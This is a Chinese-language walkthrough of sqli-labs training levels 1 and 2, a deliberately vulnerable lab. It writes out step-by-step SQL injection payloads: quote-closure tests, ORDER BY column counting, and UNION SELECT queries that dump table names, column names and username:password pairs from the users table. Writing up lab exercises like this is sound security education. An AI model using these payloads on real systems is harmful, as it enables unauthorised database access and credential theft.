sqli-labs關卡1-15
less-1
目標url:http://fgxljj.icu:88/Less-1/
(1) 判斷注入點
輸入單引號,頁面報錯(語法錯誤,說明輸入的單引號被帶入到資料庫並執行了)
(2) 判斷注入型別(數字型,字元型)
構造 ?id=1 and 1=1 回顯正確
構造 ?id=1 and 1=2 回顯正確
即沒有進行邏輯判斷,故注入型別為字元型
(3)判斷閉合方式,並進行閉合
構造 ?id=1' and 1=1 -- + 回顯正確
構造 ?id=1' and 1=2 -- + 回顯錯誤
以上可得閉合成功
(4) 判斷欄位數(order by)
構造 ?id=1' order by 1 -- + 回顯正確
構造 ?id=1' order by 2 -- + 回顯正確
構造 ?id=1' order by 3 -- + 回顯正確
構造 ?id=1' order by 4 -- + 回顯錯誤
故表users只有3列
(5) 判斷回顯點
構造 ?id=-1' union select 1,2,3 -- + 聯合查詢(id置於-1,查詢結果為空,則顯示聯合查詢後面的回顯點)
回顯點為2,3
(6) 查詢相關內容
爆庫 構造 ?id=1' union select 1,2,database() -- +
爆表 構造 ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
爆列 構造 ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users '-- +
爆值 構造 ?id=-1' union select 1,2,group_concat(username,':',password) from users -- +
less-2
目標url:http://fgxljj.icu:88/Less-2/
(1) 判斷注入點
輸入單引號,頁面報錯(語法錯誤,說明輸入的單引號被帶入到資料庫並執行了)
(2) 判斷注入型別(數字型,字元型)
構造 ?id=1 and 1=1 回顯正確
構造 ?id=1 and 1=2 回顯錯誤
故注入型別為數字型
(3) 判斷欄位數(order by)
構造 ?id=1 order by 1 回顯正確
構造 ?id=1 order by 2 回顯正確
構造 ?id=1 order by 3 回顯正確
構造 ?id=1 order by 4 回顯錯誤
故表users只有3列
(4) 判斷回顯點
構造 ?id=-1 union select 1,2,3 聯合查詢(id置於-1,查詢結果為空,則顯示聯合查詢後面的回顯點)
回顯點為2,3
(5) 查詢相關內容
爆庫 構造 ?id=1 union select 1,2,database()
爆表 構造 ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
爆列 構造 ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users
爆值 構造 ?id=-1 union select 1,2,group_concat(username,':',password) from users
